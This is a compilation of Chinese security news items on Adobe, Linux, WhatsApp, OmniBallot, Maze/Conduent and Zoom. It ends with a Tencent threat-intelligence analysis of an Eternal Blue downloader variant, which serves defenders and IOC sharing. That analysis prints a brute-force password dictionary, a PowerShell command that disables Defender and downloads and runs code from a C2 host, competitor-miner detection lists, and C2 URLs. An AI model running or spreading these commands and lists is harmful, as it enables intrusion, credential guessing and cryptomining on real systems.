众所周知，Flash是网络攻击的首选目标。值得注意的是，Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态，这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕，因为Adobe 在今年5月被爆出了多个严重漏洞,好在Adobe于6月9日发布了安全更新，修复了漏洞。 Adobe 被爆出的漏洞： 两个严重的越界写入漏洞（代号分别为：CVE-2020-9634，CVE-2020-9635）,一个内存损坏而导致的严重漏洞（代号：CVE-2020-9636）。 对于CVE-2020-9634，特定的漏洞存在于GIF文件的解析中，该问题是由于缺乏对用户提供的数据的正确验证而导致的，这可能导致写操作超出了分配对象的末尾。 对于CVE-2020-9635，PDF文件的解析中存在特定漏洞。问题是由于缺乏对用户提供的数据的正确验证而导致的，这可能导致在分配的对象开始之前进行写操作。 攻击者可以利用CVE-2020-9634，CVE-2020-9635两个漏洞在当前进程的上下文中执行代码，诱使用户打开特定文件或访问恶意页面。 对于CVE-2020-9636，该漏洞是在释放内存后尝试访问的。这可能导致一系列恶意影响，从导致程序崩溃到潜在地导致执行任意代码-甚至启用完整的远程代码执行功能。 受影响的产品版本 1.包括Adobe Flash Player桌面运行时（Windows，macOS和Linux），适用于Google Chrome的Adobe Flash Player（适用于Windows，macOS，Linux和Chrome OS）以及适用于Microsoft Edge / Internet Explorer 11（适用于Windows 10和8.1）的Adobe Flash Player，均适用于32.0版.0.330及更早版本。 2.适用于Windows的Adobe Framemaker版本2019.0.5及更低版本。 升级修复版本 Adobe Flash Player更新到32.0.0.387版本，加强安全性。该版本除了修复最近爆出的漏洞，还可以解决历史上风险较高的产品中的漏洞。 Adobe Framemaker版本升级到2019.0.6版本或最新版本。 其他漏洞 Adobe还修补了与Experience Manager（其用于构建网站，移动应用程序和表格的内容管理平台）中的六个重要级别的漏洞。这些包括可能允许敏感信息泄露的服务器端请求伪造故障（CVE-2020-9643和CVE-2020-9645）和跨站点脚本漏洞（CVE-2020-9647，CVE-2020-9648，CVE-2020 -9651和CVE-2020-9644），可以在浏览器中启用任意JavaScript执行。 受影响的产品版本 Adobe Experience Manager (AEM)所有平台6.5版本 升级修复版本 建议所有用户迅速更新到AEM 最新版本（目前最新版本为：6.5.5.0），加强安全性。     （稿源：TechWeb，封面源自网络。）

近日，Linux 内核项目负责人 Linus Torvalds 拒绝了 AWS 工程师提交的一个补丁，该补丁的目的是减轻 Intel CPU 遭遇一种新型窥探攻击而导致数据泄露的风险。 这种新型攻击名为“探听辅助 L1 数据采样攻击”，简称 Snoop （CVE-2020-0550）。今年 3 月，来自 AWS 的软件工程师 Pawel Wieczorkiewicz 率先发现了 Intel 处理器的这一漏洞，它可能会泄露 CPU 内部存储器或缓存中的数据，涉及 CPU 包括 Intel 旗下流行的 Xeon 和 Core 系列处理器。Pawel 迅速向 Intel 报告了此问题，随后该漏洞被 Intel 定位为中等严重性漏洞。 新的 Snoop 攻击利用了 Intel CPU 多级缓存、缓存一致性和总线监听等特性，通过位于 CPU 内核中的一级数据缓存（L1D），通过“总线监听”（bus snooping）功能 —— 在 L1D 中修改数据时发生的缓存更新操作，将数据从 CPU 中泄漏出来。 以近代 CPU 的视角来说，计算机通常会采用三级缓存的设计来提高 CPU 的运行效率。三级缓存包括 L1 一级缓存、L2 二级缓存、L3 三级缓存，这些缓存都集成在 CPU 内，它们的作用是作为 CPU 与主内存之间的高速数据缓冲区。其中 L1 最靠近 CPU 核心；L2其次；L3再次。运行速度方面：L1最快、L2次快、L3最慢；容量大小方面：L1最小、L2较大、L3最大。在执行一项任务时，CPU 会先在最快的 L1 中寻找需要的数据，找不到再去找次快的 L2，还找不到再去找 L3，L3 都没有才去内存找。 而一级缓存其实还分为一级数据缓存（Data Cache，D-Cache，L1D）和一级指令缓存(Instruction Cache，I-Cache，L1I)，分别用于存放数据及执行数据的指令解码，两者可同时被CPU 访问，减少了 CPU 多核心、多线程争用缓存造成的冲突，提高了处理器的性能。一般CPU 的 L1I 和 L1D 具备相同的容量，例如 I7-8700K 的 L1 即为 32KB+32KB。Snoop 攻击就是一种窃取 L1D 缓存中数据的攻击手段。 不过 Intel 的用户也不用惊慌，据 Intel 官方解释说，这种新攻击「很难实施」，并且不会泄露大量数据，毕竟 L1D 缓存中的数据非常有限，并且只有在任务运行时调用数据的短暂时间内才会存在。“我们不认为 Snoop 攻击在可信赖的操作系统环境下是一种实用的攻击方法，因为要利用这一漏洞需要同时满足很多苛刻的条件，比如攻击的时间要正好与用户打开程序的时间吻合，且程序调用的数据正好是攻击者想要窃取的数据。” 该漏洞披露之后，另一位来自 AWS 的软件工程师 Balbir Singh 为 Linux 内核提交了一个补丁，该补丁使 Linux 的应用程序能够选择在任务切换时自动刷新 L1D 的缓存，以降低 Linux 系统遭遇 Snoop 攻击的风险。 Singh 在 4 月份曾解释说：“这个补丁可以防止他们的数据在任务结束后被监听或通过旁道泄露。”他原本打算该补丁可以随 Linux 内核的 5.8 版一起发布。“如果硬件支持，该特性将允许基于可选加入的应用程序调用 prctl() 功能来刷新任务关闭后残留在 CPU 中的 L1D 缓存。” 但是，知名技术测试网站 Phoronix 指出，在任务结束后刷新 L1D 缓存会导致 CPU 的性能降低。Linux 内核项目负责人 Linus Torvalds 认为，这将导致使用该补丁的所有 Linux 用户（无论是否采用 Intel CPU）的 CPU 性能降低，严正拒绝了该补丁，同时还一如既往地说起了骚话。 Torvalds 在回复该提交的邮件列表中写道：“因为在我看来，这基本上是将缓存刷新指令导出到用户空间，并为进程提供了一种方式，可以说让与这事情无关的其他人也慢了下来。” “换言之，据我所知，这就是疯狂的 Intel 发布了有缺陷的 CPU，它给虚拟化代码带来了问题（我对此并不太在意），但现在要因为它的问题影响到本来就没有这些问题的 Linux 用户，这是完全没有意义的。” 在一番非常 Linus 式的回复下，Linus 对虚拟化的引用其实也是针对 AWS 的，AWS 和其他云服务提供商一样，销售的虚拟 cpu 通常启用了同步多线程（simultaneous multithreading，SMT）功能。Linus 接着指出，“在启用 SMT 的情况下，任务调度是分布式进行的，所以说，在任务结束与新任务开始之间刷新 L1D 缓存是非常愚蠢的。” 值得一提的是，AWS 的首席工程师 Benjamin Herrenschmidt 在与 Red Hat Linux 内核贡献者 Ingo Molnar 的讨论中也为该补丁的争论添加了一些背景。Herrenschmidt 承认这个补丁对 SMT 来说毫无意义，但他敦促 Linux 内核开发人员不要“把婴儿和洗澡水一起扔掉”，并反驳了这个补丁是因为 AWS 想把超线程作为虚拟 cpu 出售的说法。Herrenschmidt 说，“这些补丁并不是要解决运行 SMT 的客户 VM 内部出现的问题，也不是要保护 VM 免受同一系统上其他 VM 的攻击。” 事实上，Linus 已经不是第一次严辞拒绝与 Intel CPU 有关的补丁。2018 年初，为了修补 Spectre 漏洞，Intel 工程师提供了一个间接分支限制推测（indirect branch restricted speculation, IBRS）功能的补丁，Linus 当时就在邮件列表中公开指出 IBRS 会造成系统性能大幅降低。 而就在上个月，Linus 对自己的私人电脑进行了升级，同时公开了自己最新的主力机器配置，他把自己的 CPU 换成了 AMD Ryzen Threadripper ，放弃使用了 15 年的 Intel 处理器。     （稿源：开源中国，封面源自网络。）

某安全研究人员透露，WhatsApp 惊现一个允许在谷歌搜索引擎上暴露用户手机号码的 bug 。虽然不是所有用户的号码都被暴露，但这个问题还是引发了他们的关注。但若用户只与自己认识的 WhatsApp 用户交谈过（未使用过群组邀请链接），便有很大的几率不会受到本次漏洞的影响。   安全研究人员 Athul Jayaram 表示，WhatsApp 高管已经知晓了这个问题，但却对此无动于衷。据悉，该问题与今年早些时候推出的 WhatsApp 二维码功能有关。 WhatsApp 先前发布的群组邀请链接的工作方式，不同于新的二维码功能，但前者显然要更安全一些 —— 因为后者使用了未加密的 http://wa.me/ 短网址系统、且并未在链接中隐藏用户的电话号码。 当用户在新系统上分享二维码时，如果该网址被谷歌爬虫抓取，便极有可能被编入搜索引擎的索引结果中。如果你担心自己的号码也被意外收入，请通过 site:wa.me + 国家 / 地区代码的方式检索核实。 目前，如果通过 site:api.whatsapp.com 的方式检索，谷歌搜索引擎还会返回成千上万的检索结果。但除非 WhatsApp 高层正视该问题，否则此事的负面影响肯定还会持续。     （稿源：cnBeta，封面源自网络。）

  根据麻省理工学院和密歇根大学的计算机科学家周日发表的一篇研究论文，一种名为OmniBallot的在线选票传递和投票服务在几个层面上存在安全漏洞。《纽约时报》首次报道的这篇论文称，软件制造商Democracy Live让选票容易被操纵，收集敏感的选民信息，并且在选票在互联网上传播时无法控制标记的选票。因此，该文件总结道该公司无法证实中途是否被操纵。 调查结果不包括具体的软件漏洞，而是得出结论，交付选票和接收回票的过程可能太容易被操纵。一个漏洞来源来自于该软件对第三方软件和服务的依赖，包括亚马逊、谷歌和Cloudflare等公司的软件和服务，而Democracy Live并不控制这些软件和服务。 “我们发现，OmniBallot使用了一种简单化的互联网投票方式，很容易被选民设备上的恶意软件以及内部人员或其他攻击者操纵投票，这些攻击者可以入侵Democracy Live、亚马逊、谷歌或Cloudflare，”研究人员在论文中说。 此外，研究人员并没有找到隐私政策，解释Democracy Live如何保护用户的身份、选票和可以在线识别用户身份的技术数据。 针对该报告，Democracy Live告诉CNET，其计划在其投票门户上提供隐私政策，供选民查看。Democracy Live还将在其系统未来的所有部署中提供投票验证工具。该公司还表示，虽然研究人员表示，不应该让选民选择以电子方式返回已标记的选票，但大多数州都要求像Democracy Live这样的供应商提供这一选项。该公司表示，OmniBallot电子退票系统比使用电子邮件附件或传真系统退票更安全，这些都是选民获得的其他选择。 最后，Democracy Live强调，其技术是为残障人士设计的，对他们来说，持有、阅读和标记纸质邮寄选票可能不是一个选择。“没有任何技术是‘防弹的’，”Democracy Live首席执行官Bryan Finney告诉《纽约时报》。“但我们需要能够让被剥夺权利的人获得选举权。” 这项研究凸显了围绕网络投票的问题，网络安全专家和美国国土安全部表示，网络投票存在着被黑客攻击和操纵的高风险。该研究结果也是在对邮寄投票以及处理选举的最佳方式，同时最大限度地减少COVID-19的传播进行激烈辩论的时候出现的。 最近美国有三个州表示将使用OmniBallot。研究人员能够在7个州和另外11个州内的98个较小的地方找到投票服务的网址，其中包括华盛顿州的一个县级保护区，此前有报道称他们使用了在线投票系统来提高选民投票率。 研究人员发现，OmniBallot在选民的网络浏览器上工作。选民验证身份后，会收到一份PDF格式的选票。根据他们的位置，选民可以打印空白选票，以电子方式标记选票，然后打印出来传真或邮寄，或者标记选票，然后在线提交。     （稿源：cnBeta，封面源自网络。）

Maze勒索软件运营商声称已经成功攻击了商业服务巨头Conduent，他们窃取了其网络上未加密的文件并攻破加密设备。Conduent是一家位于美国新泽西州的商业服务公司，拥有6.7万名员工，2019年业务收入为44.7亿美元。 今天，Maze勒索软件操作者在他们的数据泄露网站上发布了一个新的条目，称他们在2020年5月入侵Conduent网络。在进行攻击时，Maze勒索软件的操作者会在部署勒索软件之前窃取未加密的文件。这些被窃取的数据和公开发布的威胁，被用作杠杆，说服受害者支付赎金。Maze勒索入侵者公布的入侵Conduent的证据，包括1GB文件，据称是在勒索软件攻击期间被盗取的。发布的文件名为’BusinessIntelligence.zip’和’Compliance1.zip’，包括各种财务电子表格、客户审计、发票、佣金报表和其他杂项文件。 由于已经发布的数据类型多样，Conduent必须将其作为数据泄露事件向客户和员工披露。在给BleepingComputer的一份声明中，Conduent证实他们在2020年5月29日遭受了勒索软件攻击，影响服务约10小时。Conduent表示：“旗下欧洲业务在2020年5月29日星期五经历了一次服务中断。我们的系统识别到了勒索软件，随后我们的网络安全协议对其进行了处理。这次中断始于欧洲中部时间5月29日凌晨12点45分，到欧洲中部时间当天上午10点，系统大部分又恢复了生产，此后所有系统都恢复了。这导致我们向部分客户提供的服务部分中断。随着我们的调查继续进行，我们有内部和外部安全取证和反病毒团队在审查和监控我们的欧洲基础设施。 威胁情报公司Bad Packets表示，在2019年12月17日到2020年2月14日之间的至少8周时间里，Conduent公司有一台Citrix服务器被曝出存在CVE-2019-19781漏洞。该漏洞允许攻击者在易受攻击的设备上进行远程代码执行，该漏洞已于2020年1月被修补。攻击者将这些设备作为中转站，然后在损害更多设备的同时，在内部网络中横向扩散。据悉，CVE-2019-19781漏洞过去曾被黑客用来入侵网络并部署勒索软件。虽然目前还不能确认这个漏洞是否被用作这次攻击的一部分，但Maze勒索软件操作者过去一直都是利用漏洞来进行网络入侵。     （稿源：cnBeta，封面源自网络。）  

早在今年4月份左右,Zoom被爆出漏洞,在Dark Web和黑客论坛上,超过50万个Zoom帐户可供出售,1块钱可以买7000个。在某些情况下，是免费赠送的。这些凭据是通过凭据注入攻击收集的，其中黑客尝试使用在较早的数据泄露中泄露的帐户尝试登录Zoom。然后将成功的登录名编译成列表，然后出售给其他黑客。 网络安全情报公司Cyble 告诉BleepingComputer，大约2020年4月1日，他们开始在黑客论坛上看到免费的Zoom帐户发布，以在黑客社区中获得越来越高的声誉。 这些帐户通过文本共享站点共享，黑客在该站点上发布电子邮件地址和密码组合的列表。 在以下示例中，免费放出了与佛蒙特大学，科罗拉多大学，达特茅斯，拉斐特，佛罗里达大学等学院相关的290个帐户。 BleepingComputer已联系了这些列表中显示的随机电子邮件地址，并确认某些凭据是正确的。 一位暴露的用户告诉BleepingComputer，列出的密码是旧密码，这表明其中一些凭证可能来自较旧的凭证注入攻击。 批量出售帐户 在看到卖家在黑客论坛上发布帐户后，Cyble伸出手来大量购买大量帐户，以便可以将潜在的漏洞用于警告客户。 Cyble能够以每个帐户0.0020美元的价格购买不到5美分的Zoom凭证（大约530,000个）。 购买的帐户包括受害者的电子邮件地址，密码，个人会议URL及其HostKey。 Cyble告诉BleepingComputer，这些帐户包括大通，花旗银行，教育机构等知名公司的帐户。 对于属于Cyble客户的帐户，情报公司能够确认它们是有效的帐户凭据。 Zoom在给BleepingComputer的声明中说，他们已经雇用了情报公司来帮助查找这些密码转储，以便他们可以重置受影响的用户的密码。 “为消费者服务的网络服务通常会受到此类活动的攻击，这通常涉及不良行为者测试来自其他平台的大量已被破坏的凭据，以查看用户是否在其他地方重用了它们。这种攻击通常不会会影响使用他们自己的单点登录系统的大型企业客户，我们已经聘请了多家情报公司来查找这些密码转储以及用于创建密码转储的工具，并且该公司已关闭了数千个试图欺骗网站的网站用户下载恶意软件或放弃其凭据。我们将继续进行调查，以锁定我们发现遭到入侵的帐户，要求用户将其密码更改为更安全的方式，并正在寻求实施其他技术解决方案以支持我们的努力。” 更改Zoom密码（如果在其他地方使用） 由于所有公司都受到凭据注入攻击的影响，因此对于注册帐户的每个站点，您必须使用唯一的密码。 通过这些攻击，利用暴露在过去数据泄露中的帐户，然后在线销售，每个站点使用唯一的密码可以防止一个站点的数据泄露影响另一个站点数据。 您还可以通过“ 我已被拥有”和Cyble的AmIBreached数据泄露通知服务检查您的电子邮件地址是否因数据泄露而泄漏。 两种服务都将列出包含您的电子邮件地址的数据泄露事件，并进一步确认您的凭据已被公开。     （稿源：TechWeb，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现最新变种，此次变种的病毒延续上个版本的邮件蠕虫攻击方法，利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送与新冠肺炎主题相关的钓鱼邮件。同时新增SMBGhost（CVE-2020-0796）漏洞检测和上报、新增SSH爆破攻击相关代码，推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击，a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、弱口令爆破、钓鱼邮件群发等方式进行攻击传播，将XMRig门罗币矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball（“黑球”），因此将此次攻击命名为“黑球”行动。 二、样本分析 1.钓鱼邮件攻击 首先从outlook应用程序会话中获取邮箱联系人。 然后自动生成readme.doc，readme.js两种附件文件，并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。 在$mail.Body中添加待发送邮件的邮件主题内容，从预置的9个主题中随机选择，主要包含“新冠肺炎COVID-19”， “日常联系对话”，“文件损坏无法查看”三种类型，具体内容如下： 生成的钓鱼邮件示例如下： 最后针对邮箱中发现的每一个联系人，依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。 2.弱口令爆破 RDP（3389端口）弱口令爆破 爆破用户名：“administrator”，密码字典： `”saadmin”,“123456”,“test1”,“zinch”,“g_czechout”,“asdf”,“Aa123456.”,“dubsmash”,“password”,“PASSWORD”,“123.com”,“admin@123”,“Aa123456”,“qwer12345”,“Huawei@123”,“123@abc”,“golden”,“123!@#qwe”,“1qaz@WSX”,“Ab123”,“1qaz!QAZ”,“Admin123”,“Administrator”,“Abc123”,“Admin@123”,“999999”,“Passw0rd”,“123qwe!@#”,“football”,“welcome”,“1”,“12”,“21”,“123”,“321”,“1234”,“12345”,“123123”,“123321”,“111111”,“654321”,“666666”,“121212”,“000000”,“222222”,“888888”,“1111”,“555555”,“1234567”,“12345678”,“123456789”,“987654321”,“admin”,“abc123”,“abcd1234”,“abcd@1234”,“abc@123”,“p@ssword”,“P@ssword”,“p@ssw0rd”,“P@ssw0rd”,“P@SSWORD”,“P@SSW0RD”,“P@w0rd”,“P@word”,“iloveyou”,“monkey”,“login”,“passw0rd”,“master”,“hello”,“qazwsx”,“password1”,“Password1”,“qwerty”,“baseball”,“qwertyuiop”,“superman”,“1qaz2wsx”,“fuckyou”,“123qwe”,“zxcvbn”,“pass”,“aaaaaa”,“love”,“administrator”,“qwe1234A”,“qwe1234a”,“123123123”,“1234567890”,“88888888”,“111111111”,“112233”,“a123456”,“123456a”,“5201314”,“1q2w3e4r”,“qwe123”,“a123456789”,“123456789a”,“dragon”,“sunshine”,“princess”,“!@#$%^&*”,“charlie”,“aa123456”,“homelesspa”,“1q2w3e4r5t”,“sa”,“sasa”,“sa123”,“sql2005”,“sa2008”,“abc”,“abcdefg”,“sapassword”,“Aa12345678”,“ABCabc123”,“sqlpassword”,“sql2008”,“11223344”,“admin888”,“qwe1234”,“A123456”,“OPERADOR”,“Password123”,“test123”,“NULL”,“user”,“test”,“Password01”,“stagiaire”,“demo”,“scan”,“P@ssw0rd123”,“xerox”,“compta”`。 爆破成功后会上报该机器的IP以及此次成功登陆使用的密码，然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(”http[:]//t.amynx.com/rdp.jsp”) SMB爆破攻击（445端口） 爆破使用用户名为”administrator”,”admin”，爆破成功后远程执行代码$ipc_code： MSSQL爆破攻击（1433端口） 使用与RDP爆破同样的密码字典，爆破成功后远程执行代码$mscmd_code： 此外，最新的攻击代码中还加如了SSH爆破相关命令，该代码将会启动SSH爆破模块，并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用，相关可能还在开发阶段，后续如果启用之后，可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。 3.漏洞攻击 1)   SMBGhost漏洞利用 永恒之蓝下载器木马变种会利用公开的漏洞检测代码检测存在SMBGhost漏洞（编号：CVE-2020-0796、绰号：永恒之黑）的机器IP并上报。 2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796（别名：SMBGhost，绰号：永恒之黑）预警公告：https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q 2020年6月2日，国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码，腾讯安全团队已对其进行分析并预警：https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ 该漏洞的后果十分接近永恒之蓝系列，都利用Windows SMB漏洞远程攻击获取系统最高权限，除了直接攻击SMB服务端造成RCE外，攻击者可以构造特定的网页，压缩包，共享目录，OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布，使得漏洞利用风险骤然升级，被黑灰产修改即可用于网络攻击。 2)   永恒之蓝漏洞利用 利用永恒之蓝漏洞攻击，攻击后远程执行代码$sc_code。 3)   Lnk漏洞（CVE-2017-8464）利用 Lnk漏洞利用CVE-2017-8464，在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件，一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js，通过伪装的文件在被误点击时感染病毒。 4.清除竞品挖矿木马 永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息，包括各类挖矿木马安装的服务、计划任务、进程名，以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。 通过服务名匹配： `$SrvName =“xWinWpdSrv”, “SVSHost”, “Microsoft Telemetry”, “lsass”, “Microsoft”, “system”, “Oracleupdate”, “CLR”, “sysmgt”, “\gm”, “WmdnPnSN”, “Sougoudl”,“National”, “Nationaaal”, “Natimmonal”, “Nationaloll”, “Nationalmll”,“Nationalaie”,“Nationalwpi”,“WinHelp32”,“WinHelp64”, “Samserver”, “RpcEptManger”, “NetMsmqActiv Media NVIDIA”, “Sncryption Media Playeq”,“SxS”,“WinSvc”,“mssecsvc2.1”,“mssecsvc2.0”,“Windows_Update”,“Windows Managers”,“SvcNlauser”,“WinVaultSvc”,“Xtfy”,“Xtfya”,“Xtfyxxx”,“360rTys”,“IPSECS”,“MpeSvc”,“SRDSL”,“WifiService”,“ALGM”,“wmiApSrvs”,“wmiApServs”,“taskmgr1”,“WebServers”,“ExpressVNService”,“WWW.DDOS.CN.COM”,“WinHelpSvcs”,“aspnet_staters”,“clr_optimization”,“AxInstSV”,“Zational”,“DNS Server”,“Serhiez”,“SuperProServer”,“.Net CLR”,“WissssssnHelp32”,“WinHasdadelp32”,“WinHasdelp32”,“ClipBooks”` 通过计划任务名匹配： `$TaskName = “my1″,”Mysa”, “Mysa1”, “Mysa2”, “Mysa3”, “ok”, “Oracle Java”, “Oracle Java Update“, “Microsoft Telemetry“, “Spooler SubSystem Service“,”Oracle Products Reporter“, “Update service for products“, “gm“, “ngm“,”Sorry“,”Windows_Update“,”Update_windows“,”WindowsUpdate1“,”WindowsUpdate2“,”WindowsUpdate3“,”AdobeFlashPlayer“,”FlashPlayer1“,”FlashPlayer2“,”FlashPlayer3“,”IIS“,”WindowsLogTasks“,”System Log Security Check“,”Update“,”Update1“,”Update2“,”Update3“,”Update4“,”DNS“,”SYSTEM“,”DNS2“,”SYSTEMa“,”skycmd“,”Miscfost“,”Netframework“,”Flash“,”RavTask“,”GooglePingConfigs“,”HomeGroupProvider“,”MiscfostNsi“,”WwANsvc“,”Bluetooths“,”Ddrivers“,”DnsScan“,”WebServers“,”Credentials“,”TablteInputout“,”werclpsyport“,”HispDemorn“,”LimeRAT-Admin“,”DnsCore“,”Update service for Windows Service“,”DnsCore“,”ECDnsCore“` 通过命令行特征匹配： `$_.CommandLine -like‘*pool.monero.hashvault.pro*’ –Or $_.CommandLine -like ‘*blazepool*’ –Or$_.CommandLine -like ‘*blockmasters*’ –Or $_.CommandLine -like‘*blockmasterscoins*’ –Or $_.CommandLine -like ‘*bohemianpool*’ –Or$_.CommandLine -like ‘*cryptmonero*’ –Or $_.CommandLine -like ‘*cryptonight*’–Or $_.CommandLine -like ‘*crypto-pool*’ –Or $_.CommandLine -like‘*–donate-level*’ –Or $_.CommandLine -like ‘*dwarfpool*’ –Or $_.CommandLine-like ‘*hashrefinery*’ –Or $_.CommandLine -like ‘*hashvault.pro*’ –Or$_.CommandLine -like ‘*iwanttoearn.money*’ –Or $_.CommandLine -like‘*–max-cpu-usage*’ –Or $_.CommandLine -like ‘*mine.bz*’ –Or $_.CommandLine-like ‘*minercircle.com*’ –Or $_.CommandLine -like ‘*minergate*’ –Or$_.CommandLine -like ‘*miners.pro*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*minexmr*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*mineXMR*’ –Or $_.CommandLine -like‘*miningpoolhubcoins*’ –Or $_.CommandLine -like ‘*mixpools.org*’ –Or$_.CommandLine -like ‘*mixpools.org*’ –Or $_.CommandLine -like ‘*monero*’ –Or$_.CommandLine -like ‘*monero*’ –Or $_.CommandLine -like‘*monero.lindon-pool.win*’ –Or $_.CommandLine -like ‘*moriaxmr.com*’ –Or $_.CommandLine-like ‘*mypool.online*’ –Or $_.CommandLine -like ‘*nanopool.org*’ –Or$_.CommandLine -like ‘*nicehash*’ –Or $_.CommandLine -like ‘*-p x*’ –Or$_.CommandLine -like ‘*pool.electroneum.hashvault.pro*’ –Or $_.CommandLine-like ‘*pool.xmr*’ –Or $_.CommandLine -like ‘*poolto.be*’ –Or $_.CommandLine-like ‘*prohash*’ –Or $_.CommandLine -like ‘*prohash.net*’ –Or $_.CommandLine-like ‘*ratchetmining.com*’ –Or $_.CommandLine -like ‘*slushpool*’ –Or$_.CommandLine -like ‘*stratum+*’ –Or $_.CommandLine -like ‘*suprnova.cc*’ –Or$_.CommandLine -like ‘*teracycle.net*’ –Or $_.CommandLine -like ‘*usxmrpool*’–Or $_.CommandLine -like ‘*viaxmr.com*’ –Or $_.CommandLine -like ‘*xmrpool*’–Or $_.CommandLine -like ‘*yiimp*’ –Or $_.CommandLine -like ‘*zergpool*’ –Or $_.CommandLine-like ‘*zergpoolcoins*’ –Or $_.CommandLine -like ‘*zpool*’` 通过网络端口匹配： `($psids[0] -eq $line[-1]) –and $t.contains(“ESTABLISHED”) –and ($t.contains(“:1111”) –or $t.contains(“:2222”) –or $t.contains(“:3333”) –or $t.contains(“:4444”) –or $t.contains(“:5555”) –or $t.contains(“:6666”) –or $t.contains(“:7777”) –or $t.contains(“:8888”) –or $t.contains(“:9999”) –or $t.contains(“:14433”) –or $t.contains(“:14444”) –or $t.contains(“:45560”) –or $t.contains(“:65333”))` 通过进程名匹配： `$Miner =“SC”,“WerMgr”,“WerFault”,“DW20”,“msinfo”, “XMR*”,“xmrig*”, “minerd”, “MinerGate”, “Carbon”, “yamm1”, “upgeade”, “auto-upgeade”, “svshost”, “SystemIIS”, “SystemIISSec”, &apos;WindowsUpdater*&apos;, “WindowsDefender*”, “update”, “carss”, “service”, “csrsc”, “cara”, “javaupd”, “gxdrv”, “lsmosee”, “secuams”, “SQLEXPRESS_X64_86”, “Calligrap”, “Sqlceqp”, “Setting”, “Uninsta”, “conhoste”,“Setring”,“Galligrp”,“Imaging”,“taskegr”,“Terms.EXE”,“360”,“8866”,“9966”,“9696”,“9797”,“svchosti”,“SearchIndex”,“Avira”,“cohernece”,“win”,“SQLforwin”,“xig*”,“taskmgr1”,“Workstation”,“ress”,“explores”` 5.执行Payload 通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码： http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为：t.amynx.com、t.zer9g.com、t.zz3r0.com，并且安装计划任务blackball（“黑球”），该计划任务无实际代码执行。 然后mail.jsp安装三个随机名计划任务（分别为<random>、<random>\<random>、MicroSoft\Windows\<random>），执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。 a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin，并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行，连接矿池lplp.ackng.com:443挖矿，导致CPU占用率接近100%。 将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2，即不对outlook任何可疑活动进行提示。 然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin，获取邮箱所有联系人，依次发送钓鱼邮件，进入下一轮攻击流程。 6.历次版本修改 根据腾讯安全威胁情报中心持续跟踪结果，永恒之蓝下载器木马在2018~2020间，已升级十余次，历次变化情况如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com   URL： http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp   md5 参考链接： https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

